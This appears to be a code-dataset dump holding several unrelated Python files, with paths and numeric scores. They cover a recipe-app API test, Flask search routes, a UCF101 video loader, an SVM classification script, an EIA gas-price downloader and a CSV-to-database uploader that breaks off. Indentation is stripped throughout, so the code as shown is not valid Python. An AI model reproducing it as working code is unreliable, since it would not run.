# {'user_id': user1.user_id, 'username': 'testing123', 'bio': 'A human!'},
# {'user_id': user2.user_id, 'username': 'testing456', 'bio': None}
# ])
# Get user data
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user2.user_id}', headers=header)
data = response.json()
self.assertIsInstance(data, dict)
self.matchDict(data, user_id=user2.user_id, username="testing456", bio=None)
# Update user data
header = {'Authorization': f'Bearer {user1.access_token}'}
payload = {'username': 'totallyNotAdmin', 'bio': 'Code. Create. Coordinate.'}
response = requests.patch(f'{URL}/users/{user1.user_id}', headers=header, json=payload)
data = response.json()
self.matchDict(data, user_id=user1.user_id, username="totallyNotAdmin", bio="Code. Create. Coordinate.")
# Change password
header = {'Authorization': f'Bearer {user2.refresh_token}'}
payload = {'old_password': '<PASSWORD>', 'new_password': '<PASSWORD>'}
response = requests.post(f'{URL}/account/changepassword', headers=header, json=payload)
self.assertEqual(response.status_code, 204)
user2.password = '<PASSWORD>'
# Try login
payload = {'username': 'testing456', 'password': '<PASSWORD>'}
response = requests.post(f'{URL}/account/login', json=payload)
self.assertEqual(response.status_code, 200)
# Follow another user
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.post(f'{URL}/users/{user1.user_id}/follows/{user2.user_id}', headers=header)
# Follow a second user
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.post(f'{URL}/users/{user1.user_id}/follows/{user3.user_id}', headers=header)
# Get user follows
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/follows', headers=header)
follows_data = response.json()
self.assertEqual(len(follows_data), 2)
# Get user 1 followers
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/followers', headers=header)
follows_data = response.json()
self.assertEqual(len(follows_data), 0)
# Get user 2 followers
header = {'Authorization': f'Bearer {user2.access_token}'}
response = requests.get(f'{URL}/users/{user2.user_id}/followers', headers=header)
follows_data = response.json()
self.assertEqual(len(follows_data), 1)
# Get follow state
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/follows/{user3.user_id}', headers=header)
# Create new recipe
header = {'Authorization': f'Bearer {user3.access_token}'}
payload = {
'name': 'Edible food',
'description': 'Very tasting food',
'portion': 3,
'difficulty': 5,
'is_public': True,
'steps': [
{'step_number': 1, 'description': 'Add water.'},
{'step_number': 2, 'description': 'Add egg.'}
],
'ingredients': [
{'name': 'Egg', 'quantity': 10.0, 'unit': 'grams'},
{'name': 'Water', 'quantity': 5.0, 'unit': 'kg'}
],
'tags': [
{'name': 'edible'},
{'name': 'tasty'},
{'name': 'modern'}
]
}
response = requests.put(f'{URL}/recipes', headers=header, json=payload)
recipe_data = response.json()
self.matchDict(
recipe_data,
user_id=user3.user_id,
name="Edible food",
description='Very tasting food',
portion=3,
difficulty=5,
is_public=True
)
# Add a new review
header = {'Authorization': f'Bearer {user1.access_token}'}
payload = {
'rating': 4,
'comment': 'this is the best recipe!'
}
response = requests.put(f'{URL}/recipes/{recipe_data["recipe_id"]}/reviews', headers=header, json=payload)
self.assertEqual(response.status_code, 201)
# Get reviews
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}/reviews', headers=header)
review_data = response.json()
self.assertEqual(response.status_code, 200)
print(review_data)
# Get tag suggestions
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/recipes/tagsuggestions', headers=header)
data = response.json()
# Get all recipe
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user3.user_id}/recipes', headers=header)
data = response.json()
# Get recipe data
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header)
data = response.json()
self.assertDictEqual(data, recipe_data)
# Update recipe data
header = {'Authorization': f'Bearer {user3.access_token}'}
payload = {'name': 'Poison'}
response = requests.patch(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header, json=payload)
data = response.json()
self.assertEqual(data.get('name'), 'Poison')
# Add a recipe step
header = {'Authorization': f'Bearer {user3.access_token}'}
payload = {'step_number': 3, 'description': 'Boil over stove.'}
response = requests.put(f'{URL}/recipes/{recipe_data["recipe_id"]}/steps', headers=header, json=payload)
data = response.json()
self.matchDict(data, recipe_id=recipe_data["recipe_id"], **payload)
# Get a recipe steps
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}/steps', headers=header, json=payload)
data = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(data), 3)
# Add recipe images
header = {'Authorization': f'Bearer {user3.access_token}'}
test_images = []
with open('tests/test1.png', 'rb') as image_file:
test_images.append(('images', image_file.read()))
with open('tests/test2.png', 'rb') as image_file:
test_images.append(('images', image_file.read()))
with open('tests/test3.png', 'rb') as image_file:
test_images.append(('images', image_file.read()))
response = requests.put(f'{URL}/recipes/{recipe_data["recipe_id"]}/images', headers=header, files=test_images)
# Get recipe images
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.post(f'{URL}/recipes/{recipe_data["recipe_id"]}/images', headers=header)
self.assertEqual(response.status_code, 200)
with open('tests/recipe_images.zip', "wb") as file:
file.write(response.content)
# Get recipe data with icons stuff
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header)
data = response.json()
# User like recipe
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.post(f'{URL}/recipes/{recipe_data["recipe_id"]}/likes/{user1.user_id}', headers=header)
self.assertEqual(response.status_code, 201)
# Another user like recipe
header = {'Authorization': f'Bearer {user2.access_token}'}
response = requests.post(f'{URL}/recipes/{recipe_data["recipe_id"]}/likes/{user2.user_id}', headers=header)
self.assertEqual(response.status_code, 201)
# Get user likes
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/recipes/likes', headers=header)
like_data = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(like_data), 1)
# Get recipe likes
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}/likes', headers=header)
like_data = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(like_data), 2)
# User unlike recipe
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.delete(f'{URL}/recipes/{recipe_data["recipe_id"]}/likes/{user1.user_id}', headers=header)
self.assertEqual(response.status_code, 204)
# User doesn't have likes
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/recipes/likes', headers=header)
like_data = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(like_data), 0)
# Get user stats
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.get(f'{URL}/users/{user3.user_id}/stats', headers=header)
print(response.json())
self.assertEqual(response.status_code, 200)
# Get the amazing discover page
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/discover', headers=header)
discover_data = response.json()
print(discover_data)
# Delete recipe
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.delete(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header)
self.assertEqual(response.status_code, 204)
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header)
self.assertEqual(response.status_code, 404)
# Upload profile image
header = {'Authorization': f'Bearer {user2.access_token}'}
with open('tests/test0.png', 'rb') as image_file:
test_image = {'image': image_file.read()}
response = requests.put(f'{URL}/users/{user2.user_id}/profileimage', headers=header, files=test_image)
self.assertEqual(response.status_code, 200)
# Download profile image
header = {'Authorization': f'Bearer {user2.access_token}'}
response = requests.get(f'{URL}/users/{user2.user_id}/profileimage', headers=header)
self.assertEqual(response.status_code, 200)
with open('tests/downloaded_test.png', "wb") as file:
file.write(response.content)
# Delete profile image
header = {'Authorization': f'Bearer {user2.access_token}'}
response = requests.delete(f'{URL}/users/{user2.user_id}/profileimage', headers=header)
self.assertEqual(response.status_code, 200)
def matchDict(self, actual, **expected):
for key, value in expected.items():
self.assertEqual(actual.get(key), value)
if __name__ == '__main__':
unittest.main() | 0.479504 | 0.182717 |
from flask import render_template, request, Blueprint
from randomarchive.main.forms import SearchForm
from randomarchive.models import User
from randomarchive import db, mysql
from randomarchive.config import Config
import MySQLdb.cursors
main = Blueprint('main', __name__)
@main.route("/")
@main.route("/home")
def home():
page = request.args.get('page', 1, type=int)
cur = mysql.connection.cursor()
sql_select_query = """SELECT * FROM post ORDER BY date_posted DESC"""
cur.execute(sql_select_query)
results = cur.fetchall()
page = 1
page_num = 1
results_per_page = 5
for result in results:
user = User.query.filter_by(id=result['user_id']).first()
result['author.username'] = user.username
result['author.email'] = user.email
result['author.image_file'] = 'https://storage.googleapis.com/' + Config.GCS_BUCKET_NAME + '/' + user.image_file + '?cloudshell=true&orgonly=true&supportedpurview=organizationId'
if results_per_page == 0:
page_num = page_num + 1
result['page'] = page_num
results_per_page = results_per_page - 1
#print(str(results[0]['title']))
#print(str(page_num))
#print(str(page))
return render_template('home.html', posts=results, pages=page_num+1, page=page)
@main.route("/about")
def about():
architecture_diagram = 'https://storage.googleapis.com/' + Config.GCS_BUCKET_NAME + '/RandomArchive%20Architecture.jpg?cloudshell=true&orgonly=true&supportedpurview=organizationId'
return render_template('about.html', title='About', arch_diagram=architecture_diagram)
@main.route("/search")
def search():
searchterm = request.args['search']
return search_posts(searchterm)
@main.route("/<string:searchterm>")
def search_posts(searchterm):
searchform = SearchForm()
page = request.args.get('page', 1, type=int)
sql_select_query = '''SELECT * FROM post WHERE title LIKE %s OR content LIKE %s OR user_id LIKE %s ORDER BY post.date_posted DESC'''
wild_search = '%' + searchterm + '%'
select_tuple = (wild_search, wild_search, wild_search)
cur = mysql.connection.cursor()
cur.execute(sql_select_query, select_tuple)
results = cur.fetchall()
page_num = 1
results_per_page = 5
for result in results:
user = User.query.filter_by(id=result['user_id']).first()
result['author.username'] = user.username
result['author.email'] = user.email
result['author.image_file'] = 'https://storage.googleapis.com/' + Config.GCS_BUCKET_NAME + '/' + user.image_file + '?cloudshell=true&orgonly=true&supportedpurview=organizationId'
if results_per_page == 0:
page_num = page_num + 1
result['page'] = page_num
results_per_page = results_per_page - 1
return render_template('search_posts.html', posts=results, searchterm=searchterm, pages=page_num+1, page=page, total=len(results)) | randomarchive/main/routes.py | from flask import render_template, request, Blueprint
from randomarchive.main.forms import SearchForm
from randomarchive.models import User
from randomarchive import db, mysql
from randomarchive.config import Config
import MySQLdb.cursors
main = Blueprint('main', __name__)
@main.route("/")
@main.route("/home")
def home():
page = request.args.get('page', 1, type=int)
cur = mysql.connection.cursor()
sql_select_query = """SELECT * FROM post ORDER BY date_posted DESC"""
cur.execute(sql_select_query)
results = cur.fetchall()
page = 1
page_num = 1
results_per_page = 5
for result in results:
user = User.query.filter_by(id=result['user_id']).first()
result['author.username'] = user.username
result['author.email'] = user.email
result['author.image_file'] = 'https://storage.googleapis.com/' + Config.GCS_BUCKET_NAME + '/' + user.image_file + '?cloudshell=true&orgonly=true&supportedpurview=organizationId'
if results_per_page == 0:
page_num = page_num + 1
result['page'] = page_num
results_per_page = results_per_page - 1
#print(str(results[0]['title']))
#print(str(page_num))
#print(str(page))
return render_template('home.html', posts=results, pages=page_num+1, page=page)
@main.route("/about")
def about():
architecture_diagram = 'https://storage.googleapis.com/' + Config.GCS_BUCKET_NAME + '/RandomArchive%20Architecture.jpg?cloudshell=true&orgonly=true&supportedpurview=organizationId'
return render_template('about.html', title='About', arch_diagram=architecture_diagram)
@main.route("/search")
def search():
searchterm = request.args['search']
return search_posts(searchterm)
@main.route("/<string:searchterm>")
def search_posts(searchterm):
searchform = SearchForm()
page = request.args.get('page', 1, type=int)
sql_select_query = '''SELECT * FROM post WHERE title LIKE %s OR content LIKE %s OR user_id LIKE %s ORDER BY post.date_posted DESC'''
wild_search = '%' + searchterm + '%'
select_tuple = (wild_search, wild_search, wild_search)
cur = mysql.connection.cursor()
cur.execute(sql_select_query, select_tuple)
results = cur.fetchall()
page_num = 1
results_per_page = 5
for result in results:
user = User.query.filter_by(id=result['user_id']).first()
result['author.username'] = user.username
result['author.email'] = user.email
result['author.image_file'] = 'https://storage.googleapis.com/' + Config.GCS_BUCKET_NAME + '/' + user.image_file + '?cloudshell=true&orgonly=true&supportedpurview=organizationId'
if results_per_page == 0:
page_num = page_num + 1
result['page'] = page_num
results_per_page = results_per_page - 1
return render_template('search_posts.html', posts=results, searchterm=searchterm, pages=page_num+1, page=page, total=len(results)) | 0.217504 | 0.053034 |
from __future__ import print_function, division
import os
import pandas as pd
from skimage import io, transform
import numpy as np
import random
import matplotlib.pyplot as plt
from torch.utils.data import Dataset, DataLoader
# Ignore warnings
import warnings
warnings.filterwarnings("ignore")
plt.ion() # interactive mode
class UCF101(Dataset):
"""UCF101 Landmarks dataset."""
def __init__(self, info_list, root_dir, transform=None):
"""
Args:
info_list (string): Path to the info list file with annotations.
root_dir (string): Directory with all the video frames.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.landmarks_frame = pd.read_csv(info_list, delimiter=' ', header=None)
self.root_dir = root_dir
self.transform = transform
def __len__(self):
return len(self.landmarks_frame)
# get (16,240,320,3)
def __getitem__(self, idx):
video_path = os.path.join(self.root_dir, self.landmarks_frame.iloc[idx, 0])
video_label = self.landmarks_frame.iloc[idx, 1]
video_x = self.get_single_video_x(video_path)
sample = {'video_x': video_x, 'video_label': video_label}
if self.transform:
sample = self.transform(sample)
return sample
def get_single_video_x(self, video_path):
slash_rows = video_path.split('.')
dir_name = slash_rows[0]
video_jpgs_path = os.path.join(self.root_dir, dir_name)
# get the random 16 frame
data = pd.read_csv(os.path.join(video_jpgs_path, 'n_frames'), delimiter=' ', header=None)
frame_count = data[0][0]
video_x = np.zeros((16, 240, 320, 3))
image_start = random.randint(1, frame_count - 17)
image_id = image_start
for i in range(16):
s = "%05d" % image_id
image_name = 'image_' + s + '.jpg'
image_path = os.path.join(video_jpgs_path, image_name)
tmp_image = io.imread(image_path)
video_x[i, :, :, :] = tmp_image
image_id += 1
return video_x | src/library/utils/datasets/ucf101.py | from __future__ import print_function, division
import os
import pandas as pd
from skimage import io, transform
import numpy as np
import random
import matplotlib.pyplot as plt
from torch.utils.data import Dataset, DataLoader
# Ignore warnings
import warnings
warnings.filterwarnings("ignore")
plt.ion() # interactive mode
class UCF101(Dataset):
"""UCF101 Landmarks dataset."""
def __init__(self, info_list, root_dir, transform=None):
"""
Args:
info_list (string): Path to the info list file with annotations.
root_dir (string): Directory with all the video frames.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.landmarks_frame = pd.read_csv(info_list, delimiter=' ', header=None)
self.root_dir = root_dir
self.transform = transform
def __len__(self):
return len(self.landmarks_frame)
# get (16,240,320,3)
def __getitem__(self, idx):
video_path = os.path.join(self.root_dir, self.landmarks_frame.iloc[idx, 0])
video_label = self.landmarks_frame.iloc[idx, 1]
video_x = self.get_single_video_x(video_path)
sample = {'video_x': video_x, 'video_label': video_label}
if self.transform:
sample = self.transform(sample)
return sample
def get_single_video_x(self, video_path):
slash_rows = video_path.split('.')
dir_name = slash_rows[0]
video_jpgs_path = os.path.join(self.root_dir, dir_name)
# get the random 16 frame
data = pd.read_csv(os.path.join(video_jpgs_path, 'n_frames'), delimiter=' ', header=None)
frame_count = data[0][0]
video_x = np.zeros((16, 240, 320, 3))
image_start = random.randint(1, frame_count - 17)
image_id = image_start
for i in range(16):
s = "%05d" % image_id
image_name = 'image_' + s + '.jpg'
image_path = os.path.join(video_jpgs_path, image_name)
tmp_image = io.imread(image_path)
video_x[i, :, :, :] = tmp_image
image_id += 1
return video_x | 0.692954 | 0.23783 |
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import sys
import time
from sklearn.pipeline import make_pipeline
from skrebate import ReliefF
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score, train_test_split, LeaveOneOut, KFold, StratifiedKFold
from sklearn import preprocessing
from sklearn.svm import LinearSVC
# filenames = ['alon', 'borovecki', 'burczynski', 'chiaretti', 'chin', 'chowdary', 'christensen', 'golub', 'gordon', 'gravier', 'khan', 'nakayama', 'pomeroy', 'shipp', 'singh', 'sorlie', 'su', 'subramanian', 'sun', 'tian', 'west', 'yeoh']
name = sys.argv[1]
type = sys.argv[2]
features = pd.read_csv('data/' + name + '_inputs.csv', header = None)
labels = pd.read_csv('data/' + name + '_outputs.csv', header = None)
features.fillna(0, inplace = True)
features = np.asarray(features.values)
labels = np.transpose(np.asarray(labels.values.ravel() - 1, dtype=int))
min_max_scaler = preprocessing.MinMaxScaler()
features = min_max_scaler.fit_transform(features)
if type == 'lasso':
gains = np.asarray(np.loadtxt('features/' + name + '_lasso.txt'))
indexes = np.where(gains != 0)[0]
else:
gains = np.asarray(np.loadtxt('features/' + name + '_lasso.txt'))
indexes = np.where(gains != 0)[0]
gains = np.asarray(np.loadtxt('features/' + name + '_relieff.txt'))
indexes = gains.argsort()[-indexes.shape[0]:][::-1]
scores = []
loo = LeaveOneOut()
startTime = time.time()
for train_index, test_index in loo.split(features):
x_train, x_test = features[train_index], features[test_index]
y_train, y_test = labels[train_index], labels[test_index]
X_train = x_train[:, indexes]
X_test = x_test[:, indexes]
Y_train = y_train[:]
Y_test = y_test[:]
batch_size = 1
num_classes = np.max(labels) + 1
epochs = 50
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
Y_train = Y_train[:]
Y_test = Y_test[:]
clf = LinearSVC(random_state=0)
clf.fit(X_train, Y_train)
score = clf.score(X_test, Y_test)
scores.append(score)
endTime = time.time()
with open('results/' + name + '_svm_' + type + '.txt', 'w') as file:
file.write('Score: ' + str(np.average(scores)) + '\n')
file.write('Time: ' + str(endTime - startTime))
file.close()
print('Score: ' + str(np.average(scores)))
print('Time: ' + str(endTime - startTime)) | classify_with_svm.py | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import sys
import time
from sklearn.pipeline import make_pipeline
from skrebate import ReliefF
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score, train_test_split, LeaveOneOut, KFold, StratifiedKFold
from sklearn import preprocessing
from sklearn.svm import LinearSVC
# filenames = ['alon', 'borovecki', 'burczynski', 'chiaretti', 'chin', 'chowdary', 'christensen', 'golub', 'gordon', 'gravier', 'khan', 'nakayama', 'pomeroy', 'shipp', 'singh', 'sorlie', 'su', 'subramanian', 'sun', 'tian', 'west', 'yeoh']
name = sys.argv[1]
type = sys.argv[2]
features = pd.read_csv('data/' + name + '_inputs.csv', header = None)
labels = pd.read_csv('data/' + name + '_outputs.csv', header = None)
features.fillna(0, inplace = True)
features = np.asarray(features.values)
labels = np.transpose(np.asarray(labels.values.ravel() - 1, dtype=int))
min_max_scaler = preprocessing.MinMaxScaler()
features = min_max_scaler.fit_transform(features)
if type == 'lasso':
gains = np.asarray(np.loadtxt('features/' + name + '_lasso.txt'))
indexes = np.where(gains != 0)[0]
else:
gains = np.asarray(np.loadtxt('features/' + name + '_lasso.txt'))
indexes = np.where(gains != 0)[0]
gains = np.asarray(np.loadtxt('features/' + name + '_relieff.txt'))
indexes = gains.argsort()[-indexes.shape[0]:][::-1]
scores = []
loo = LeaveOneOut()
startTime = time.time()
for train_index, test_index in loo.split(features):
x_train, x_test = features[train_index], features[test_index]
y_train, y_test = labels[train_index], labels[test_index]
X_train = x_train[:, indexes]
X_test = x_test[:, indexes]
Y_train = y_train[:]
Y_test = y_test[:]
batch_size = 1
num_classes = np.max(labels) + 1
epochs = 50
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
Y_train = Y_train[:]
Y_test = Y_test[:]
clf = LinearSVC(random_state=0)
clf.fit(X_train, Y_train)
score = clf.score(X_test, Y_test)
scores.append(score)
endTime = time.time()
with open('results/' + name + '_svm_' + type + '.txt', 'w') as file:
file.write('Score: ' + str(np.average(scores)) + '\n')
file.write('Time: ' + str(endTime - startTime))
file.close()
print('Score: ' + str(np.average(scores)))
print('Time: ' + str(endTime - startTime)) | 0.257485 | 0.274478 |
import pandas as pd
def get_daily_data():
daily_url = 'https://www.eia.gov/dnav/ng/hist_xls/RNGWHHDd.xls'
df = None
try:
df = pd.read_excel(daily_url, sheet_name='Data 1', index_col=0, header=2)
except Exception as ex:
print('Exception in get_daily_data')
print(str(ex))
finally:
return df
# This is to rename columns and resetting indices for later use
def transform(_df):
try:
_df.reset_index(level=0, inplace=True)
_df.rename(columns={'Date': 'Date', 'Henry Hub Natural Gas Spot Price (Dollars per Million Btu)': 'Price'},
inplace=True)
except Exception as ex:
print('Exception in transform')
print(str(ex))
finally:
return _df
# Generate monthly data
def generate_monthly_data(_df):
try:
_df = df_daily.set_index('Date', inplace=False)
_df.index = pd.to_datetime(_df.index)
# To ge the data of first working day of the month. Usually 1st of month but if no data is available then the next available
# day
_df = _df.resample('BMS').first()
_df.reset_index(level=0, inplace=True)
except Exception as ex:
print('Exception in generate_monthly_data')
print(str(ex))
finally:
return _df
# Save given dataframe to CSV
def save_csv(_df, file_name='daily.csv'):
try:
_df.to_csv(file_name, index=False)
except Exception as ex:
print('Exception in saving CSV file.')
print(str(ex))
finally:
return _df
if __name__ == '__main__':
df_daily = None
df_monthly = None
print('1/5: Getting the Daily Henry Hub gas prices data from EIA')
df_daily = get_daily_data()
print('2/5: Transforming the data')
df_daily = transform(df_daily)
print('3/5: Saving Daily Data into CSV file.')
save_csv(df_daily)
print('4/5: Saving Data Data into CSV file.')
df_monthly = generate_monthly_data(df_daily)
print('5/5: Saving Monthly Data into CSV file.')
save_csv(df_monthly, 'monthly.csv')
print(
'\n\nThe processes completed. The resultant daily and monthly data can be seen in graphical format in daily.html and monthly.html respectively.\nIn case CSV file name is changed, you must edit the HTML files.') | process.py | import pandas as pd
def get_daily_data():
daily_url = 'https://www.eia.gov/dnav/ng/hist_xls/RNGWHHDd.xls'
df = None
try:
df = pd.read_excel(daily_url, sheet_name='Data 1', index_col=0, header=2)
except Exception as ex:
print('Exception in get_daily_data')
print(str(ex))
finally:
return df
# This is to rename columns and resetting indices for later use
def transform(_df):
try:
_df.reset_index(level=0, inplace=True)
_df.rename(columns={'Date': 'Date', 'Henry Hub Natural Gas Spot Price (Dollars per Million Btu)': 'Price'},
inplace=True)
except Exception as ex:
print('Exception in transform')
print(str(ex))
finally:
return _df
# Generate monthly data
def generate_monthly_data(_df):
try:
_df = df_daily.set_index('Date', inplace=False)
_df.index = pd.to_datetime(_df.index)
# To ge the data of first working day of the month. Usually 1st of month but if no data is available then the next available
# day
_df = _df.resample('BMS').first()
_df.reset_index(level=0, inplace=True)
except Exception as ex:
print('Exception in generate_monthly_data')
print(str(ex))
finally:
return _df
# Save given dataframe to CSV
def save_csv(_df, file_name='daily.csv'):
try:
_df.to_csv(file_name, index=False)
except Exception as ex:
print('Exception in saving CSV file.')
print(str(ex))
finally:
return _df
if __name__ == '__main__':
df_daily = None
df_monthly = None
print('1/5: Getting the Daily Henry Hub gas prices data from EIA')
df_daily = get_daily_data()
print('2/5: Transforming the data')
df_daily = transform(df_daily)
print('3/5: Saving Daily Data into CSV file.')
save_csv(df_daily)
print('4/5: Saving Data Data into CSV file.')
df_monthly = generate_monthly_data(df_daily)
print('5/5: Saving Monthly Data into CSV file.')
save_csv(df_monthly, 'monthly.csv')
print(
'\n\nThe processes completed. The resultant daily and monthly data can be seen in graphical format in daily.html and monthly.html respectively.\nIn case CSV file name is changed, you must edit the HTML files.') | 0.406862 | 0.351061 |
import argparse
import csv
import json
from typing import Dict, List, Tuple
import requests
DUPLICATE_ARG_NAME = "duplicate"
def generate_authkey(username: str, password: str, server: str) -> Dict:
print(username)
postdata = {'username': username, 'password': password}
res = requests.post(server, json=postdata)
print(res.text)
return res.json()
def write_fail_csv(entries: List, path: str):
with open(path, 'w') as csv_f:
csv_w = csv.writer(csv_f, delimiter=',')
csv_w.writerows(entries)
def parse_csv_to_memory(csv_path: str) -> List[List]:
"""This probably doesn't need to be a function but it's separated for
testability and to do additional functionality when parsing CSVs.
"""
with open(csv_path) as csv_f:
csv_r = csv.reader(csv_f, delimiter=',')
csv_data = [row for row in csv_r]
return csv_data
def load_csv_to_db(
csv_data: List[List], entrymap: Dict, server: str, authkey: Dict,
dry_run: bool = False
) -> List[List]:
failed_entries = []
for entry in csv_data[1:]:
# Do a dry run if no server address
if not server:
dry_run = True
server = '0.0.0.0'
res_code, res_text, postdata = send_entry(
server, entry, entrymap, dry_run, authkey)
if res_code not in {200, 201}: # STATUS CODE not OK
entry.extend([postdata, res_text, res_code])
failed_entries.append(entry)
return failed_entries
def build_entrymap(csv_column_names: List, column_map: Dict) -> Dict:
"""Builds a db column name to csv column index mapping. If no mapping file
is given, we naively create the mapping using the order of the rows.
column_map provided should be {csv column name: db column name},
not including the primary ID.
The function returns {db column name: csv column index}
"""
# Naive approach, assumes the csv column names matches the db column names
db_content_names = csv_column_names[1:]
if column_map is None:
return {
column_name: index
for index, column_name in enumerate(db_content_names, start=1)
}
if len(column_map) != len(db_content_names):
print("WARNING: The db and csv column mapping file provided are "
"mismatched in length. db column names are: "
f"\n{db_content_names}\nThe provided column mapping "
f"generated the following maping: \n{column_map}")
# Using mapping provided by user to create the mapping
db_column_to_index_map = {}
for csv_column_name, db_column_name in column_map.items():
if csv_column_name not in db_content_names:
print(f"WARNING: {csv_column_name} not part of the db column "
f"names for values {db_content_names}. This may be warning"
"may be triggered due to including the primary key in the "
"mapping file. To not have this warning printed, remove "
"that mapping entry.")
continue
db_column_to_index_map[db_column_name] = csv_column_names.index(
csv_column_name)
return db_column_to_index_map
def send_entry(
server: str, entry: List, entrymap: Dict, dry_run: bool, authkey: Dict
) -> Tuple[int, str, Dict]:
postdata = {}
for column_name, csv_index in entrymap.items():
# Skip the entry if a column identifying duplicates exists
if column_name == DUPLICATE_ARG_NAME:
if entry[csv_index]:
return 200, None, None
continue
postdata[column_name] = entry[csv_index]
print(postdata)
if not dry_run:
auth_headers = {'Authorization': 'JWT ' + authkey['access_token']}
res = requests.post(server, json=postdata, headers=auth_headers)
res_code = res.status_code
res_text = res.text
print(res_code, res_text)
else:
res_code = 200 # STATUS CODE OK
res_text = "Dry run, no response text"
return res_code, res_text, postdata
def main(argv):
authkey = None
if not argv.dry_run:
authkey = generate_authkey(
argv.auth_username, argv.auth_password, argv.auth_api)
elif not argv.server_address:
print("\nWARNING: A server address was not provided in args. "
"Only printing results locally. Use the -h arg if you don't "
"know what this means.\n")
else:
print("\nThis is a dry run. No data will be loaded to server whether "
"a server_address has been provided or not.\n")
csv_data = parse_csv_to_memory(argv.csv_path)
if argv.entrymap_path is not None:
with open(argv.entrymap_path, "r") as fp:
column_map = json.load(fp)
if argv.duplicate_column_name is not None:
column_map[argv.duplicate_column_name] = DUPLICATE_ARG_NAME
else:
column_map = None
entrymap = build_entrymap(
csv_column_names=csv_data[0],
column_map=column_map)
failed_entries = load_csv_to_db(
csv_data=csv_data,
entrymap=entrymap,
server=argv.server_address,
authkey=authkey,
dry_run=argv.dry_run)
total_failed_entries = len(failed_entries)
if total_failed_entries > 1:
print(
"\nTHERE WERE {} ENTRIES THAT FAILED TO BE PROCESSED. "
"PLEASE SEE \"{}\" TO DETERMINE IF THERE'S ANY DATA REMEDIATION "
"THAT'S NEEDED.\n".format(
total_failed_entries, argv.fail_csv_path))
write_fail_csv(failed_entries, argv.fail_csv_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Parse a specifically formatted CSV')
parser.add_argument(
'--csv_path', '-c', dest='csv_path', required=True,
help='the path to the csv file')
parser.add_argument(
'--entrymap_path', '-e', dest='entrymap_path', required=False,
default=None,
help='the path to the JSON mapping file for db column names to csv'
' column names')
parser.add_argument(
'--dry_run', '-d', dest='dry_run', action='store_true',
help='performs a dry run locally when provided with a '
'server_address')
parser.add_argument(
'--fail_csv_path', '-f', dest='fail_csv_path',
default='./failed_entires.csv',
help='the path to drop a csv with failed entries')
parser.add_argument(
'--duplicate_column_name', '-dc', dest='duplicate_column_name',
required=False, default=None,
help='The column name where duplicate is marked and skipped. If there '
'are any values within that column, it will count as a hit.')
parser.add_argument(
'--server', '-s', dest='server_address', required=False,
help='the server address for the results to be uploaded')
parser.add_argument(
'--user', '-u', dest='auth_username', required=True,
help='the username to log in to the api with')
parser.add_argument(
'--pass', '-p', dest='auth_password', required=True,
help='the password to log in to the api with')
parser.add_argument(
'--auth', '-a', dest='auth_api', required=True,
help='the auth api')
args = parser.parse_args()
main(args) | main.py | import argparse
import csv
import json
from typing import Dict, List, Tuple
import requests
DUPLICATE_ARG_NAME = "duplicate"
def generate_authkey(username: str, password: str, server: str) -> Dict:
print(username)
postdata = {'username': username, 'password': password}
res = requests.post(server, json=postdata)
print(res.text)
return res.json()
def write_fail_csv(entries: List, path: str):
with open(path, 'w') as csv_f:
csv_w = csv.writer(csv_f, delimiter=',')
csv_w.writerows(entries)
def parse_csv_to_memory(csv_path: str) -> List[List]:
"""This probably doesn't need to be a function but it's separated for
testability and to do additional functionality when parsing CSVs.
"""
with open(csv_path) as csv_f:
csv_r = csv.reader(csv_f, delimiter=',')
csv_data = [row for row in csv_r]
return csv_data
def load_csv_to_db(
csv_data: List[List], entrymap: Dict, server: str, authkey: Dict,
dry_run: bool = False
) -> List[List]:
failed_entries = []
for entry in csv_data[1:]:
# Do a dry run if no server address
if not server:
dry_run = True
server = '0.0.0.0'
res_code, res_text, postdata = send_entry(
server, entry, entrymap, dry_run, authkey)
if res_code not in {200, 201}: # STATUS CODE not OK
entry.extend([postdata, res_text, res_code])
failed_entries.append(entry)
return failed_entries
def build_entrymap(csv_column_names: List, column_map: Dict) -> Dict:
